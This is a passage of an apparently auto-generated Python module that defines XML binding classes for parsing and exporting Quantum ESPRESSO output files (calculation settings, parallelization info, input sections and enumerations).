    holds no single quotes; otherwise double-quoted with embedded double
    quotes backslash-escaped.
    """
    if "'" not in inStr:
        delim = "'''" if '\n' in inStr else "'"
        return '%s%s%s' % (delim, inStr, delim)
    body = inStr.replace('"', '\\"') if '"' in inStr else inStr
    delim = '"""' if '\n' in body else '"'
    return '%s%s%s' % (delim, body, delim)
def get_all_text_(node):
    """Return *node*'s direct text: its .text plus each child's .tail."""
    parts = [node.text if node.text is not None else '']
    parts.extend(child.tail for child in node if child.tail is not None)
    return ''.join(parts)
def find_attr_value_(attr_name, node):
    """Look up attribute *attr_name* (optionally 'prefix:name') on *node*.

    Returns the attribute value or None when not found / unresolvable.
    """
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, local = parts
        # Resolve the prefix through the node's nsmap (lxml-provided)
        # into '{uri}local' Clark notation before the lookup.
        uri = node.nsmap.get(prefix)
        if uri is not None:
            return attrs.get('{%s}%s' % (uri, local))
    return None
class GDSParseError(Exception):
    """Raised (via raise_parse_error) when XML content fails to parse/convert."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError, annotating *msg* with the node's tag and line."""
    # node.sourceline is supplied by lxml elements.
    detail = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
    raise GDSParseError(detail)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace,
pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(
outfile, level, namespace, name,
pretty_print=pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
    """Descriptor for one member of a generated binding class: its name,
    XSD data type (or chain of types), container flag, optionality,
    child attributes and choice-group membership."""
    def __init__(self, name='', data_type='', container=0,
                 optional=0, child_attrs=None, choice=None):
        self.name = name
        self.data_type = data_type
        self.container = container
        self.child_attrs = child_attrs
        self.choice = choice
        self.optional = optional
    def set_name(self, name): self.name = name
    def get_name(self): return self.name
    def set_data_type(self, data_type): self.data_type = data_type
    def get_data_type_chain(self): return self.data_type
    def get_data_type(self):
        # data_type may be a chain (list) of XSD types; the effective type
        # is the last entry, defaulting to xs:string for an empty chain.
        if isinstance(self.data_type, list):
            if len(self.data_type) > 0:
                return self.data_type[-1]
            else:
                return 'xs:string'
        else:
            return self.data_type
    def set_container(self, container): self.container = container
    def get_container(self): return self.container
    def set_child_attrs(self, child_attrs): self.child_attrs = child_attrs
    def get_child_attrs(self): return self.child_attrs
    def set_choice(self, choice): self.choice = choice
    def get_choice(self): return self.choice
    def set_optional(self, optional): self.optional = optional
    def get_optional(self): return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class HubbardProjType(object):
    """Enumeration constants for the 'HubbardProjType' XSD simple type."""
    ATOMIC='atomic'
    ORTHOATOMIC='ortho-atomic'
    NORMATOMIC='norm-atomic'
    PSEUDO='pseudo'
    FILE='file'
class calculationType(object):
    """Enumeration constants for the 'calculationType' XSD simple type."""
    SCF='scf'
    NSCF='nscf'
    BANDS='bands'
    RELAX='relax'
    VCRELAX='vc-relax'
    MD='md'
    VCMD='vc-md'
class constr_typeType(object):
    """Enumeration constants for the 'constr_typeType' XSD simple type."""
    TYPE_COORD='type_coord'
    ATOM_COORD='atom_coord'
    DISTANCE='distance'
    PLANAR_ANGLE='planar_angle'
    TORSIONAL_ANGLE='torsional_angle'
    BENNET_PROJ='bennet_proj'
class controlRestartModeType(object):
    """Enumeration constants for the 'controlRestartModeType' XSD simple type."""
    FROM_SCRATCH='from_scratch'
    RESTART='restart'
class diagoType(object):
    """Enumeration constants for the 'diagoType' XSD simple type."""
    DAVIDSON='davidson'
    CG='cg'
class electric_potentialType(object):
    """Enumeration constants for the 'electric_potentialType' XSD simple type."""
    SAWTOOTH_POTENTIAL='sawtooth_potential'
    HOMOGENOUS_FIELD='homogenous_field'
    BERRY__PHASE='Berry_Phase'
    NONE='none'
class functionalType(object):
    """Enumeration constants for the 'functionalType' XSD simple type."""
    PZ='PZ'
    BP='BP'
    PBE='PBE'
    REVPBE='REVPBE'
    PBESOL='PBESOL'
    BLYP='BLYP'
    OLYP='OLYP'
    PW_91='PW91'
    WC='WC'
    SOGGA='SOGGA'
    EV_93='EV93'
    B_3_LYP='B3LYP'
    GAU_PBE='GauPBE'
    PBE_0='PBE0'
    HSE='HSE'
    VDWDF='VDW-DF'
    VDWDFCX='VDW-DF-CX'
    VDWDFC_09='VDW-DF-C09'
    VDWDFOB_86='VDW-DF-OB86'
    VDWDFOBK_8='VDW-DF-OBK8'
    VDWDF_2='VDW-DF2'
    VDWDF_2C_09='VDW-DF2-C09'
    VDWDF_2B_86_R='VDW-DF2-B86R'
    RVV_10='RVV10'
class lowhighType(object):
    """Enumeration constants for the 'lowhighType' XSD simple type."""
    LOW='low'
    HIGH='high'
class mixingModeType(object):
    """Enumeration constants for the 'mixingModeType' XSD simple type."""
    PLAIN='plain'
    TF='TF'
    LOCALTF='local-TF'
class smearingChoiceType(object):
    """Enumeration constants for the 'smearingChoiceType' XSD simple type."""
    GAUSSIAN='gaussian'
    MP='mp'
    MV='mv'
    FD='fd'
class statusType(object):
    """Enumeration constants for the 'statusType' XSD simple type
    (allowed exit-status codes, stored as strings)."""
    _0='0'
    _1='1'
    _2='2'
    _3='3'
    _2_55='255'
class espressoType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, Units=None, general_info=None, parallel_info=None, input=None, step=None, output=None, status=None, cputime=None, closed=None):
self.original_tagname_ = None
self.Units = _cast(None, Units)
self.general_info = general_info
self.parallel_info = parallel_info
self.input = input
if step is None:
self.step = []
else:
self.step = step
self.output = output
self.status = status
self.validate_statusType(self.status)
self.cputime = cputime
self.closed = closed
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, espressoType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if espressoType.subclass:
return espressoType.subclass(*args_, **kwargs_)
else:
return espressoType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_general_info(self): return self.general_info
def set_general_info(self, general_info): self.general_info = general_info
def get_parallel_info(self): return self.parallel_info
def set_parallel_info(self, parallel_info): self.parallel_info = parallel_info
def get_input(self): return self.input
def set_input(self, input): self.input = input
def get_step(self): return self.step
def set_step(self, step): self.step = step
def add_step(self, value): self.step.append(value)
def insert_step_at(self, index, value): self.step.insert(index, value)
def replace_step_at(self, index, value): self.step[index] = value
def get_output(self): return self.output
def set_output(self, output): self.output = output
def get_status(self): return self.status
def set_status(self, status): self.status = status
def get_cputime(self): return self.cputime
def set_cputime(self, cputime): self.cputime = cputime
def get_closed(self): return self.closed
def set_closed(self, closed): self.closed = closed
def get_Units(self): return self.Units
def set_Units(self, Units): self.Units = Units
def validate_statusType(self, value):
# Validate type statusType, a restriction on integer.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['0', '1', '2', '3', '255']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on statusType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.general_info is not None or
self.parallel_info is not None or
self.input is not None or
self.step or
self.output is not None or
self.status is not None or
self.cputime is not None or
self.closed is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='espressoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('espressoType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='espressoType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='espressoType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='espressoType'):
if self.Units is not None and 'Units' not in already_processed:
already_processed.add('Units')
outfile.write(' Units=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Units), input_name='Units')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='espressoType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.general_info is not None:
self.general_info.export(outfile, level, namespaceprefix_, name_='general_info', pretty_print=pretty_print)
if self.parallel_info is not None:
self.parallel_info.export(outfile, level, namespaceprefix_, name_='parallel_info', pretty_print=pretty_print)
if self.input is not None:
self.input.export(outfile, level, namespaceprefix_, name_='input', pretty_print=pretty_print)
for step_ in self.step:
step_.export(outfile, level, namespaceprefix_, name_='step', pretty_print=pretty_print)
if self.output is not None:
self.output.export(outfile, level, namespaceprefix_, name_='output', pretty_print=pretty_print)
if self.status is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:status>%s</qes:status>%s' % (self.gds_format_integer(self.status, input_name='status'), eol_))
if self.cputime is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:cputime>%s</qes:cputime>%s' % (self.gds_format_integer(self.cputime, input_name='cputime'), eol_))
if self.closed is not None:
self.closed.export(outfile, level, namespaceprefix_, name_='closed', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Units', node)
if value is not None and 'Units' not in already_processed:
already_processed.add('Units')
self.Units = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'general_info':
obj_ = general_infoType.factory()
obj_.build(child_)
self.general_info = obj_
obj_.original_tagname_ = 'general_info'
elif nodeName_ == 'parallel_info':
obj_ = parallel_infoType.factory()
obj_.build(child_)
self.parallel_info = obj_
obj_.original_tagname_ = 'parallel_info'
elif nodeName_ == 'input':
obj_ = inputType.factory()
obj_.build(child_)
self.input = obj_
obj_.original_tagname_ = 'input'
elif nodeName_ == 'step':
obj_ = stepType.factory()
obj_.build(child_)
self.step.append(obj_)
obj_.original_tagname_ = 'step'
elif nodeName_ == 'output':
obj_ = outputType.factory()
obj_.build(child_)
self.output = obj_
obj_.original_tagname_ = 'output'
elif nodeName_ == 'status' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'status')
self.status = ival_
# validate type statusType
self.validate_statusType(self.status)
elif nodeName_ == 'cputime' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ < 0:
raise_parse_error(child_, 'requires nonNegativeInteger')
ival_ = self.gds_validate_integer(ival_, node, 'cputime')
self.cputime = ival_
elif nodeName_ == 'closed':
obj_ = closedType.factory()
obj_.build(child_)
self.closed = obj_
obj_.original_tagname_ = 'closed'
# end class espressoType
class general_infoType(GeneratedsSuper):
    """Generated binding for the <general_info> element: XML format tag,
    creator, creation stamp and job name of a Quantum ESPRESSO run."""
    subclass = None
    superclass = None
    def __init__(self, xml_format=None, creator=None, created=None, job=None):
        self.original_tagname_ = None
        self.xml_format = xml_format
        self.creator = creator
        self.created = created
        self.job = job
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, general_infoType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        cls = general_infoType.subclass or general_infoType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_xml_format(self): return self.xml_format
    def set_xml_format(self, xml_format): self.xml_format = xml_format
    def get_creator(self): return self.creator
    def set_creator(self, creator): self.creator = creator
    def get_created(self): return self.created
    def set_created(self, created): self.created = created
    def get_job(self): return self.job
    def set_job(self, job): self.job = job
    def hasContent_(self):
        """True when at least one child element is set."""
        return any((self.xml_format is not None,
                    self.creator is not None,
                    self.created is not None,
                    self.job is not None))
    def export(self, outfile, level, namespaceprefix_='qes:', name_='general_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('general_infoType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='general_infoType')
        if not self.hasContent_():
            # No children: close as an empty-element tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='general_infoType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='general_infoType'):
        # This element carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='general_infoType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order."""
        eol_ = '\n' if pretty_print else ''
        for tag in ('xml_format', 'creator', 'created'):
            child = getattr(self, tag)
            if child is not None:
                child.export(outfile, level, namespaceprefix_, name_=tag, pretty_print=pretty_print)
        if self.job is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:job>%s</qes:job>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.job), input_name='job')), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            tag = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This element carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Deserialize one child element into the matching attribute."""
        dispatch = {
            'xml_format': xml_formatType,
            'creator': creatorType,
            'created': createdType,
        }
        if nodeName_ in dispatch:
            obj_ = dispatch[nodeName_].factory()
            obj_.build(child_)
            setattr(self, nodeName_, obj_)
            obj_.original_tagname_ = nodeName_
        elif nodeName_ == 'job':
            self.job = self.gds_validate_string(child_.text, node, 'job')
# end class general_infoType
class parallel_infoType(GeneratedsSuper):
    """Generated binding for the <parallel_info> element: MPI/OpenMP
    decomposition counts (processes, threads, tasks, band groups, pools,
    diagonalization group).  Every child is an xsd:positiveInteger."""
    subclass = None
    superclass = None
    def __init__(self, nprocs=None, nthreads=None, ntasks=None, nbgrp=None, npool=None, ndiag=None):
        self.original_tagname_ = None
        self.nprocs = nprocs
        self.nthreads = nthreads
        self.ntasks = ntasks
        self.nbgrp = nbgrp
        self.npool = npool
        self.ndiag = ndiag
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, parallel_infoType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        cls = parallel_infoType.subclass or parallel_infoType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_nprocs(self): return self.nprocs
    def set_nprocs(self, nprocs): self.nprocs = nprocs
    def get_nthreads(self): return self.nthreads
    def set_nthreads(self, nthreads): self.nthreads = nthreads
    def get_ntasks(self): return self.ntasks
    def set_ntasks(self, ntasks): self.ntasks = ntasks
    def get_nbgrp(self): return self.nbgrp
    def set_nbgrp(self, nbgrp): self.nbgrp = nbgrp
    def get_npool(self): return self.npool
    def set_npool(self, npool): self.npool = npool
    def get_ndiag(self): return self.ndiag
    def set_ndiag(self, ndiag): self.ndiag = ndiag
    def hasContent_(self):
        """True when at least one child element is set."""
        return any(getattr(self, tag) is not None for tag in
                   ('nprocs', 'nthreads', 'ntasks', 'nbgrp', 'npool', 'ndiag'))
    def export(self, outfile, level, namespaceprefix_='qes:', name_='parallel_infoType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('parallel_infoType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='parallel_infoType')
        if not self.hasContent_():
            # No children: close as an empty-element tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='parallel_infoType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='parallel_infoType'):
        # This element carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='parallel_infoType', fromsubclass_=False, pretty_print=True):
        """Serialize the six integer children in schema order."""
        eol_ = '\n' if pretty_print else ''
        for tag in ('nprocs', 'nthreads', 'ntasks', 'nbgrp', 'npool', 'ndiag'):
            value = getattr(self, tag)
            if value is not None:
                showIndent(outfile, level, pretty_print)
                outfile.write('<qes:%s>%s</qes:%s>%s' % (tag, self.gds_format_integer(value, input_name=tag), tag, eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            tag = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This element carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Deserialize one child element; every child is a positiveInteger."""
        if nodeName_ in ('nprocs', 'nthreads', 'ntasks', 'nbgrp', 'npool', 'ndiag') and child_.text:
            try:
                ival_ = int(child_.text)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            setattr(self, nodeName_, self.gds_validate_integer(ival_, node, nodeName_))
# end class parallel_infoType
class inputType(GeneratedsSuper):
    """Generated binding for the <input> element: every input section of a
    Quantum ESPRESSO calculation (control variables, species, structure,
    DFT setup, k-points, constraints, ...).  All children are optional."""
    subclass = None
    superclass = None
    def __init__(self, control_variables=None, atomic_species=None, atomic_structure=None, dft=None, spin=None, bands=None, basis=None, electron_control=None, k_points_IBZ=None, ion_control=None, cell_control=None, symmetry_flags=None, boundary_conditions=None, ekin_functional=None, external_atomic_forces=None, free_positions=None, starting_atomic_velocities=None, electric_field=None, atomic_constraints=None, spin_constraints=None):
        self.original_tagname_ = None
        self.control_variables = control_variables
        self.atomic_species = atomic_species
        self.atomic_structure = atomic_structure
        self.dft = dft
        self.spin = spin
        self.bands = bands
        self.basis = basis
        self.electron_control = electron_control
        self.k_points_IBZ = k_points_IBZ
        self.ion_control = ion_control
        self.cell_control = cell_control
        self.symmetry_flags = symmetry_flags
        self.boundary_conditions = boundary_conditions
        self.ekin_functional = ekin_functional
        self.external_atomic_forces = external_atomic_forces
        self.free_positions = free_positions
        self.starting_atomic_velocities = starting_atomic_velocities
        self.electric_field = electric_field
        self.atomic_constraints = atomic_constraints
        self.spin_constraints = spin_constraints
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, inputType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        cls = inputType.subclass or inputType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_control_variables(self): return self.control_variables
    def set_control_variables(self, control_variables): self.control_variables = control_variables
    def get_atomic_species(self): return self.atomic_species
    def set_atomic_species(self, atomic_species): self.atomic_species = atomic_species
    def get_atomic_structure(self): return self.atomic_structure
    def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
    def get_dft(self): return self.dft
    def set_dft(self, dft): self.dft = dft
    def get_spin(self): return self.spin
    def set_spin(self, spin): self.spin = spin
    def get_bands(self): return self.bands
    def set_bands(self, bands): self.bands = bands
    def get_basis(self): return self.basis
    def set_basis(self, basis): self.basis = basis
    def get_electron_control(self): return self.electron_control
    def set_electron_control(self, electron_control): self.electron_control = electron_control
    def get_k_points_IBZ(self): return self.k_points_IBZ
    def set_k_points_IBZ(self, k_points_IBZ): self.k_points_IBZ = k_points_IBZ
    def get_ion_control(self): return self.ion_control
    def set_ion_control(self, ion_control): self.ion_control = ion_control
    def get_cell_control(self): return self.cell_control
    def set_cell_control(self, cell_control): self.cell_control = cell_control
    def get_symmetry_flags(self): return self.symmetry_flags
    def set_symmetry_flags(self, symmetry_flags): self.symmetry_flags = symmetry_flags
    def get_boundary_conditions(self): return self.boundary_conditions
    def set_boundary_conditions(self, boundary_conditions): self.boundary_conditions = boundary_conditions
    def get_ekin_functional(self): return self.ekin_functional
    def set_ekin_functional(self, ekin_functional): self.ekin_functional = ekin_functional
    def get_external_atomic_forces(self): return self.external_atomic_forces
    def set_external_atomic_forces(self, external_atomic_forces): self.external_atomic_forces = external_atomic_forces
    def get_free_positions(self): return self.free_positions
    def set_free_positions(self, free_positions): self.free_positions = free_positions
    def get_starting_atomic_velocities(self): return self.starting_atomic_velocities
    def set_starting_atomic_velocities(self, starting_atomic_velocities): self.starting_atomic_velocities = starting_atomic_velocities
    def get_electric_field(self): return self.electric_field
    def set_electric_field(self, electric_field): self.electric_field = electric_field
    def get_atomic_constraints(self): return self.atomic_constraints
    def set_atomic_constraints(self, atomic_constraints): self.atomic_constraints = atomic_constraints
    def get_spin_constraints(self): return self.spin_constraints
    def set_spin_constraints(self, spin_constraints): self.spin_constraints = spin_constraints
    def hasContent_(self):
        """True when at least one child element is set."""
        return any(getattr(self, tag) is not None for tag in (
            'control_variables', 'atomic_species', 'atomic_structure',
            'dft', 'spin', 'bands', 'basis', 'electron_control',
            'k_points_IBZ', 'ion_control', 'cell_control', 'symmetry_flags',
            'boundary_conditions', 'ekin_functional',
            'external_atomic_forces', 'free_positions',
            'starting_atomic_velocities', 'electric_field',
            'atomic_constraints', 'spin_constraints'))
    def export(self, outfile, level, namespaceprefix_='qes:', name_='inputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('inputType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='inputType')
        if not self.hasContent_():
            # No children: close as an empty-element tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='inputType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='inputType'):
        # This element carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='inputType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order; each child knows how
        to export itself."""
        for tag in (
                'control_variables', 'atomic_species', 'atomic_structure',
                'dft', 'spin', 'bands', 'basis', 'electron_control',
                'k_points_IBZ', 'ion_control', 'cell_control',
                'symmetry_flags', 'boundary_conditions', 'ekin_functional',
                'external_atomic_forces', 'free_positions',
                'starting_atomic_velocities', 'electric_field',
                'atomic_constraints', 'spin_constraints'):
            child = getattr(self, tag)
            if child is not None:
                child.export(outfile, level, namespaceprefix_, name_=tag, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            tag = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This element carries no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Deserialize one child element into the matching attribute."""
        # Children with a fixed generated binding class.
        simple = {
            'control_variables': control_variablesType,
            'atomic_species': atomic_speciesType,
            'atomic_structure': atomic_structureType,
            'dft': dftType,
            'spin': spinType,
            'bands': bandsType,
            'basis': basisType,
            'electron_control': electron_controlType,
            'k_points_IBZ': k_points_IBZType,
            'ion_control': ion_controlType,
            'cell_control': cell_controlType,
            'symmetry_flags': symmetry_flagsType,
            'boundary_conditions': boundary_conditionsType,
            'ekin_functional': ekin_functionalType,
            'free_positions': integerMatrixType,
            'electric_field': electric_fieldType,
            'atomic_constraints': atomic_constraintsType,
            'spin_constraints': spin_constraintsType,
        }
        if nodeName_ in simple:
            obj_ = simple[nodeName_].factory()
        elif nodeName_ in ('external_atomic_forces', 'starting_atomic_velocities'):
            # matrixType children may carry an xsi:type override, so the
            # concrete class is resolved from the node itself.
            obj_ = self.get_class_obj_(child_, matrixType).factory()
        else:
            return
        obj_.build(child_)
        setattr(self, nodeName_, obj_)
        obj_.original_tagname_ = nodeName_
# end class inputType
class stepType(GeneratedsSuper):
    """Generated binding for a <step> element: one ionic/relaxation step with
    its SCF convergence record, structure, total energy, forces, stress and
    optional FCP quantities.  ``n_step`` is an XML attribute."""
    subclass = None
    superclass = None
